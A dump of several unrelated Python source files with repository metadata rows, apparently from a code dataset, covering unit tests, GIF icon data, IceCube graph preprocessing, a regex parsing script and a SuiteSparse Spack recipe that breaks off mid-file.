print('see tournament_allows_odd in ch01.challenge')
print(caption(chapter, exercise_number),
'Odd tournament')
with ExerciseNum(5) as exercise_number:
print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
print(caption(chapter, exercise_number),
'Failed Two largest')
| 29.066879
| 102
| 0.573573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,300
| 0.361565
|
428f6c9308ecfc2aebd2c05427a3eb4c4bcb191b
| 522
|
py
|
Python
|
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | null | null | null |
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 1
|
2019-05-06T07:36:11.000Z
|
2019-05-06T07:36:11.000Z
|
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 1
|
2019-05-03T08:49:29.000Z
|
2019-05-03T08:49:29.000Z
|
from typing import Dict
from exaslct_src.lib.data.image_info import ImageInfo
from exaslct_src.lib.data.dependency_collector.dependency_collector import DependencyInfoCollector
class DependencyImageInfoCollector(DependencyInfoCollector[ImageInfo]):
def is_info(self, input):
return isinstance(input, Dict) and IMAGE_INFO in input
def read_info(self, value) -> ImageInfo:
with value[IMAGE_INFO].open("r") as file:
return ImageInfo.from_json(file.read())
IMAGE_INFO = "image_info"
| 29
| 98
| 0.764368
| 313
| 0.599617
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.028736
|
42914f6fbdf21a73ae8be4659f5689614360b711
| 3,131
|
py
|
Python
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 970
|
2017-02-10T04:33:46.000Z
|
2022-03-26T08:11:20.000Z
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 216
|
2017-02-23T04:50:59.000Z
|
2022-03-31T13:52:57.000Z
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 238
|
2017-02-17T16:30:55.000Z
|
2022-03-03T20:10:25.000Z
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
def testCrossNamedParameters(self):
test_cases_1 = [
{'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
{'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
]
test_cases_2 = [
{'testcase_name': 'c_2', 'c': 2},
{'testcase_name': 'c_4', 'c': 4},
]
expected_cross = [
{'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
{'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
{'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
{'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
]
self.assertEqual(
test_case.cross_named_parameters(test_cases_1, test_cases_2),
expected_cross)
def testCrossParameters(self):
test_cases_1 = [('a', 1), ('b', 2)]
test_cases_2 = [(True,), (False,)]
expected_cross = [
('a', 1, True), ('b', 2, True),
('a', 1, False), ('b', 2, False),
]
self.assertCountEqual(
test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)
def testAssertDataCloseOrEqual(self):
self.assertDataCloseOrEqual([{'a': 'first',
'b': 1.0,
'c': 5,
'd': ('second', 2.0)},
{'e': 2,
'f': 3}],
[{'a': 'first',
'b': 1.0000001,
'c': 5,
'd': ('second', 2.0000001)},
{'e': 2,
'f': 3}])
    with self.assertRaisesRegex(AssertionError, r'len\(.*\) != len\(\[\]\)'):
self.assertDataCloseOrEqual([{'a': 1}], [])
    with self.assertRaisesRegex(
AssertionError,
re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
    with self.assertRaisesRegex(
AssertionError,
re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])
@test_case.parameters((1, 'a'), (2, 'b'))
def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
if __name__ == '__main__':
unittest.main()
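# A minimal sketch of the cross-product semantics exercised above; the real
# tensorflow_transform helper may differ in details such as validation.
def cross_named(cases_a, cases_b):
    crossed = []
    for a in cases_a:
        for b in cases_b:
            merged = {**a, **b}
            # join the testcase names, matching the expected values above
            merged['testcase_name'] = a['testcase_name'] + '_' + b['testcase_name']
            crossed.append(merged)
    return crossed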
| 36.835294
| 79
| 0.544874
| 2,365
| 0.75535
| 0
| 0
| 173
| 0.055254
| 0
| 0
| 1,112
| 0.355158
|
4293119f4fbe0691576ba0bf3959decad7140860
| 6,388
|
py
|
Python
|
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Base64-encoded GIF images for the GUI buttons.
'''
class app_img:
format='gif'
data='''R0lGODlhEAAQAOeRACcLIiAbCSAjCjMdMzsfMjUkGUcmRjwwJ0YqRj4xJVwoUFguRkU2MS0/LzQ8
PC8/LzM+QTJCMDJCQTpCQCxIME1CIXQyYW48KTpLO1REPEpKSktKS01KSkpLSkxLTE1LS0VNUDtS
PD9PT0tMTExMTE1MTUxNTU1NTU5NTUFUQFFOTkZRU1BPTU9QUUVTVF9PO1JUVVRVSnlNMEVeRlZX
W1ZYVVZYWF5XVFBdUkpfX2RZXIZMgVtdX11eX1tfW1xfW1tfXqZEkFtgW2NfYWZgW2tdal9iXk9m
Z19iYk9pTqZIn5lNlU1rTp1XOF9lZVxnXF5oXlNrZ59eM1FzU1dyVcVItJJmSl5ycq1Wp1t0cLlU
tWB1eF52dmKBY12DX9RWwGN/f+RSzaVzTdNbxmaEhLlzRdFhs2WJZWeJZmOMZ7Z2UXGGhm2IiGqJ
iKV+VmuKimyKi26Ojm2ScnGQkGuWb22Wb3OTk+xp2+dr5eF73Pl154SfoMKYeIampoimptiYbPuB
8viD8I2sq/KJ7pOtrZGuruebbpGvr/+I/Ja1tdqrf9i3i/iweviwhP+zhf/Hif/Lpf//////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////yH5BAEKAP8ALAAAAAAQABAA
AAjRAP8JHEiwoMGBGk6MOChQgwYgEnJwcdGjoAYbIo5EyQIGjh02axyYIOjkSqI4bci8mdPnECEk
Ggi2WFHIj6A9WyDQgEFiYIcfKR5MAMHDhJAQTCLUIGgEQ5cZDZKgqUMnDRUfMQVu8ADFi5wzUyjg
KLEh6z8PCAZhGfIEBQALZgAtMUCwyI48Y6roQRToThglAzYMZEFkgRY8X4Io0CEgBkENByDxYUAg
QAU3jB6JKUBQxYtFigw5avSnjBQZN8wKTGBFTZMLGRwy/Mfhg2qCAQEAOw=='''
class shp_img:
format='gif'
data='''R0lGODlhEAAQAMIFABAQEIBnII+HgLS0pfDwsC8gIC8gIC8gICH5BAEKAAcALAAAAAAQABAAAAND
eLrcJzBKqcQIN+MtwAvTNHTPSJwoQAigxwpouo4urZ7364I4cM8kC0x20n2GRGEtJGl9NFBMkBny
HHzYrNbB7XoXCQA7'''
class dir_img:
    format='gif'
data='''R0lGODlhEAAQAMZUABAQEB8QEB8YEC8gIC8vIEA4ME9IQF9IIFpTSWBXQHBfUFBoj3NlRoBnII9v
IIBwUGB3kH93YIZ5UZ94IJB/YIqAcLB/EI+IcICHn4+HgMCHEI6Oe4CPn4+PgMCQANCHEJ+PgICX
r9CQANCQEJ+XgJKanaCgkK+fgJykoaKjo7CgkKimk+CfIKKoo6uoleCgMLCnkNCnUKuwpLSvkrSv
mfCoMLWyn7+wkM+vcLS0pfCwML+4kPC3QNDAgM+/kPDAQP+/UODIgP/IUODQoP/QUPDQgP/QYP/P
cPDYgP/XYP/XcP/YgPDgkP/ggP/gkPDnoP/noPDwoPDwsP/woP//////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////yH5
BAEKAH8ALAAAAAAQABAAAAe1gH+Cg4SFhoQyHBghKIeEECV/ORwtEDYwmJg0hikLCzBDUlJTUCoz
hZ4LKlGjUFBKJiQkIB0XgypPpFBLSb2+toImT643N5gnJ7IgIBkXJExQQTBN1NVNSkoxFc9OMDtK
vkZEQjwvDC4gSNJNR0lGRkI/PDoNEn8gRTA+Su9CQPM1PhxY8SdDj2nw4umowWJEAwSCLqjAIaKi
Bw0WLExwcGBDRAoRHihIYKAAgQECAARwxFJQIAA7'''
class xls_img:
format='gif'
data='''R0lGODlhEAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/
/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm
AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/
MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm
ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/
mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm
zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/
/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ
AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA
M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ
ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A
mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z
zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///ywAAAAAEAAQAAAIngBfuUKF
ipBBg4MS9umTJYsrBAheSZwokGBBhwgeaNzIUSOhLKgydhz5EdWrB4oOelT5kdDJLwgUKRpEKOUX
Gtpannzw5ZVNQje15czicmNPg1lwCtW5EeirQV+IEtI2iOjOmh9dQc2SimqWQa4efGzYcGZUr4NQ
ddSWimwWr33UahRKly61qn0Iza1rl9qXKVIPIkyY8Mtft4gTTwkIADs='''
class xsl_img:
format='gif'
data='''R0lGODdhEAAQAOMPAAAAAAAAgAAAmQAA/zNmmQCAgDNm/zOZAIaGhjOZ/zPM/8DAwKbK8DP///Hx
8f///ywBAAAADwAQAAAEWBDJSeW76Or9Vn4f5zzOAp5kOo5AC2QOMxaFQcrP+zDCUzyNROAhkL14
pEJDcQiMijqkIXEYDIsOXWwU6N5Yn5VKpSWYz2fwRcwmldFo9bidhc3Hrrw+HwEAOw=='''
class log_img:
format='gif'
data='''R0lGODlhEAAQAIQQAG9s0oJ5eatyP6tycpePj6ulP6ulctWeOaulpdWentXSOcvHx9XS0v/MzP//
zP///y8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gICH5BAEK
ABAALAAAAAAQABAAAAViICSOUNMwjEOOhyIUyhAbzMoAgJAQi9EjtRGAIXgUjw9CUDR8OJ9OJakJ
fUqFjCSBZ11CqNWkt7ndLqLjbFg8zZa5bOw6znSfoVfm3clYIP5eEH4EAQFlCAsrEH2ICygoJCEA
Ow=='''
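# A hedged consumption sketch: Tk's PhotoImage accepts base64-encoded GIF data
# directly, so these classes can back GUI buttons without temporary files
# (requires a display; MetaGeta's actual widget wiring may differ).
import tkinter as tk
root = tk.Tk()
icon = tk.PhotoImage(format=app_img.format, data=app_img.data)
tk.Button(root, image=icon).pack()
root.mainloop()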
| 63.88
| 89
| 0.688009
| 5,129
| 0.802912
| 0
| 0
| 0
| 0
| 0
| 0
| 6,111
| 0.956637
|
42934dc5c7b47e76f47a4a49a47981e068b48692
| 1,417
|
py
|
Python
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
p = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
q = torch.distributions.Gamma(torch.ones(2), torch.ones(2))
torch.distributions.kl_divergence(p, q)
def test__module_parameters():
module = NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
module = NormalModule(loc=torch.zeros(1), scale=torch.ones(1))
assert {k for k, _ in module.named_parameters()} == {"loc", "scale"}
module = NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
def test__module_fixed_parameters_optimize():
module = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
optimizer = torch.optim.Adam(module.parameters(), lr=0.1)
for _ in range(100):
optimizer.zero_grad()
x = module.rsample((20,))
loss = torch.mean((x - 2.0) ** 2.0)
loss.backward()
optimizer.step()
assert float(module.loc) != pytest.approx(0.0)
assert float(module.scale) == pytest.approx(1.0)
def test_weight_hs_api():
w = WeightsHS([10, 20, 30], tau_0=1e-5)
assert w().shape == (10, 20, 30)
assert w.kl_divergence().shape == ()
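# A hedged sketch of the pattern these tests suggest: sampled weights from
# WeightsHS (assumed here to be an nn.Module) feed the data loss, with
# w.kl_divergence() added as a regularizer; the loss shape is illustrative.
w = WeightsHS([5], tau_0=1e-5)
optimizer = torch.optim.Adam(w.parameters(), lr=0.1)
x, y = torch.randn(100, 5), torch.randn(100)
for _ in range(10):
    optimizer.zero_grad()
    pred = x @ w()                      # w() draws a weight sample
    loss = torch.mean((pred - y) ** 2) + w.kl_divergence() / len(x)
    loss.backward()
    optimizer.step()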
| 28.918367
| 73
| 0.666902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 62
| 0.043754
|
4293fa719a880b9bfe3a700da09a0f285fc6495b
| 867
|
py
|
Python
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 3,027
|
2019-04-04T18:52:17.000Z
|
2022-03-30T09:38:34.000Z
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 4,080
|
2019-04-04T19:51:11.000Z
|
2022-03-31T23:45:21.000Z
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 1,342
|
2019-04-04T20:50:53.000Z
|
2022-03-31T15:22:36.000Z
|
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
def test_look_for_unconfigured_pair_rate(self):
rate_source = FixedRateSource()
self.assertIsNone(rate_source.rate("BTC-USDT"))
def test_get_rate(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("BTC-USDT"), Decimal(40000))
def test_get_rate_when_inverted_pair_is_configured(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("USDT-BTC"), Decimal(1) / Decimal(40000))
def test_string_representation(self):
self.assertEqual(str(FixedRateSource()), "fixed rates")
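# A minimal sketch consistent with the tests above (not hummingbot's actual
# implementation): direct lookup first, then the inverted pair, else None.
class MinimalFixedRateSource:
    def __init__(self):
        self._rates = {}
    def add_rate(self, pair: str, rate: Decimal):
        self._rates[pair] = rate
    def rate(self, pair: str):
        if pair in self._rates:
            return self._rates[pair]
        base, quote = pair.split("-")
        inverse = self._rates.get(quote + "-" + base)
        return Decimal(1) / inverse if inverse is not None else None
    def __str__(self):
        return "fixed rates"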
| 32.111111
| 83
| 0.731257
| 737
| 0.850058
| 0
| 0
| 0
| 0
| 0
| 0
| 63
| 0.072664
|
4297be6e9ea671a123810cad1577476fb18a42d0
| 5,293
|
py
|
Python
|
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
"""`Detector` class for IceCube-86."""
# Implementing abstract class attribute
features = FEATURES.ICECUBE86
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 100. # dom_x
data.x[:,1] /= 100. # dom_y
data.x[:,2] += 350. # dom_z
data.x[:,2] /= 100.
data.x[:,3] /= 1.05e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,3] *= 20.
data.x[:,4] /= 1. # charge
data.x[:,5] -= 1.25 # rde
data.x[:,5] /= 0.25
data.x[:,6] /= 0.05 # pmt_area
return data
class IceCubeDeepCore(IceCube86):
"""`Detector` class for IceCube-DeepCore."""
class IceCubeUpgrade(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
@property
def nb_outputs(self):
return self.nb_inputs + 3
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Assign pulse cluster indices to DOMs and PMTs, respectively
data = group_pulses_to_dom(data)
data = group_pulses_to_pmt(data)
# Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
        pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_y'], data['pmt_dir_z']), dim=1)  # stack the three PMT direction components
charge = data['charge'].unsqueeze(dim=1)
center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
vector_to_center_of_gravity = center_of_gravity - xyz
distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)
# Add new features
data.x = torch.cat((
data.x,
photoelectrons_on_pmt.unsqueeze(dim=1),
distance_to_center_of_gravity.unsqueeze(dim=1),
cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
), dim=1)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
# -- Engineered features
data.x[:,14] = torch.log10(data.x[:,14]) / 2. # photoelectrons_on_pmt
data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2. # distance_to_center_of_gravity
return data
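# A quick numeric check (illustrative only) of the IceCube86 dom_time scaling
# above: raw values spanning [0, 2.1e4] map to roughly [-20, 20].
t = torch.tensor([0.0, 1.05e4, 2.1e4])
t = (t / 1.05e4 - 1.0) * 20.0
print(t)  # tensor([-20., 0., 20.])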
| 33.713376
| 128
| 0.575477
| 5,028
| 0.949934
| 0
| 0
| 69
| 0.013036
| 0
| 0
| 1,816
| 0.343095
|
429945dde445e0205f0ceeefa695def22a8e1795
| 450
|
py
|
Python
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 22
|
2018-09-30T12:08:09.000Z
|
2020-11-18T06:32:01.000Z
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 34
|
2018-09-13T14:54:21.000Z
|
2020-03-26T18:26:26.000Z
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 17
|
2018-10-07T15:41:50.000Z
|
2021-12-10T10:29:02.000Z
|
import re
t1 = 'Data !@[value1] and also !@[system:uptime] testing.'
print("Content: " + t1)
if re.search(r'!@\[[_a-zA-Z0-9:]*\]', t1):
print("YES")
else:
print("NO")
o = re.sub(r'!@\[[_a-zA-Z0-9:]*\]', r'_B9yPrsE_\g<0>_B9yPrsE_', t1)
o2 = o.split("_B9yPrsE_")
for i in o2:
if i.startswith("!@["):
        i2 = re.sub(r'[^\w:]', "", i)
print("Parse: " + str(i) + " " +str(i2))
else:
print("Plain: '" + str(i) + "'")
| 21.428571
| 66
| 0.482222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 194
| 0.431111
|
429a7f070688a75a8c4a4c449d4d3474a9a7088a
| 5,430
|
py
|
Python
|
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | 1
|
2019-01-17T20:07:19.000Z
|
2019-01-17T20:07:19.000Z
|
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | null | null | null |
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | 2
|
2019-08-06T18:13:57.000Z
|
2021-11-05T18:19:49.000Z
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class SuiteSparse(Package):
"""
SuiteSparse is a suite of sparse matrix algorithms
"""
homepage = 'http://faculty.cse.tamu.edu/davis/suitesparse.html'
url = 'http://faculty.cse.tamu.edu/davis/SuiteSparse/SuiteSparse-4.5.1.tar.gz'
version('4.5.5', '0a5b38af0016f009409a9606d2f1b555')
version('4.5.4', 'f6ab689442e64a1624a47aa220072d1b')
version('4.5.3', '8ec57324585df3c6483ad7f556afccbd')
version('4.5.1', 'f0ea9aad8d2d1ffec66a5b6bfeff5319')
variant('tbb', default=False, description='Build with Intel TBB')
variant('pic', default=True, description='Build position independent code (required to link with shared libraries)')
variant('cuda', default=False, description='Build with CUDA')
variant('openmp', default=False, description='Build with OpenMP')
depends_on('blas')
depends_on('lapack')
depends_on('metis@5.1.0', when='@4.5.1:')
    # In @4.5.1, TBB support in SPQR seems to be broken, as the TBB-related linking
    # flags do not seem to be used, which leads to linking errors on Linux.
depends_on('tbb', when='@4.5.3:+tbb')
depends_on('cuda', when='+cuda')
patch('tbb_453.patch', when='@4.5.3:+tbb')
